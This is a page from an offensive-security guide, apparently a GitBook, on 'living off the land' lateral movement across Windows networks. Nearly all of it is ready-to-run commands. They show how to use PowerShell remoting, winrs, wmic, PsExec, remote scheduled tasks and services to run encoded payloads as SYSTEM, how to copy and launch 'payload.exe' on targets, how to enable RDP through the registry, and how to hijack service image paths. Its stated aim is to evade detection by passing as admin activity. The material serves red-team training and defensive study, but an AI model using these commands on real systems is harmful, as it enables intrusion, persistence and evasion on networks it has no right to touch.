This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Living off the Land (LotL)

Native Windows Tools for Lateral Movement

Purpose: Use legitimate Windows binaries and features to perform lateral movement without deploying additional tools.

Attack Value: Bypass detection, appear as legitimate admin activity, use trusted binaries.

Built-in Windows Remote Tools

PowerShell Remoting

# Enable PowerShell remoting
Enable-PSRemoting -Force

# Remote PowerShell session
$cred = Get-Credential
Enter-PSSession -ComputerName <target-server> -Credential $cred

# Run commands on remote systems
Invoke-Command -ComputerName <target-server> -Credential $cred -ScriptBlock {Get-Process}

# One-liner remote execution
powershell "Invoke-Command -ComputerName <target> -Credential (Get-Credential) -ScriptBlock {whoami}"

Windows Remote Management (WinRM)

# Test WinRM connectivity
winrs -r:<target-server> -u:<username> -p:<password> ipconfig

# Remote command execution
winrs -r:<target-server> -u:<domain>\<username> -p:<password> "powershell Get-Process"

# Interactive session
winrs -r:<target-server> -u:<username> -p:<password> cmd

WMIC Remote Execution

# Remote process execution via WMI
wmic /node:<target-server> /user:<username> /password:<password> process call create "cmd.exe /c whoami > C:\temp\output.txt"

# Query remote system information
wmic /node:<target-server> /user:<username> /password:<password> computersystem get name,domain,model

# Remote service management
wmic /node:<target-server> /user:<username> /password:<password> service where name="Spooler" call startservice

PsExec (Sysinternals)

# Microsoft Sysinternals PsExec
psexec \\<target-server> -u <domain>\<username> -p <password> cmd

# Execute specific commands
psexec \\<target-server> -u <domain>\<username> -p <password> -c local_script.bat

# Copy and execute
psexec \\<target-server> -u <domain>\<username> -p <password> -c -f payload.exe

Scheduled Tasks for Persistence

# Create remote scheduled task
schtasks /create /tn "UpdateTask" /tr "powershell.exe -enc <base64-payload>" /sc onlogon /ru SYSTEM /s <target-server> /u <domain>\<username> /p <password>

# Execute scheduled task
schtasks /run /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password>

# Delete scheduled task
schtasks /delete /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password> /f

Service-based Lateral Movement

# Create remote service
sc \\<target-server> create "UpdateService" binPath= "cmd.exe /c powershell.exe -enc <base64-payload>"

# Start remote service
sc \\<target-server> start "UpdateService"

# Delete remote service
sc \\<target-server> delete "UpdateService"

# Using net commands
net use \\<target-server>\ipc$ /user:<domain>\<username> <password>
copy payload.exe \\<target-server>\c$\temp\
sc \\<target-server> create "TempService" binPath= "C:\temp\payload.exe"
sc \\<target-server> start "TempService"

Registry-based Remote Execution

# Enable RDP remotely via registry
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Modify service registry remotely
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<service>" /v ImagePath /t REG_SZ /d "C:\temp\payload.exe" /f
PreviousRemote Execution TechniquesNextLateral Movement Strategy

Last updated

Was this helpful?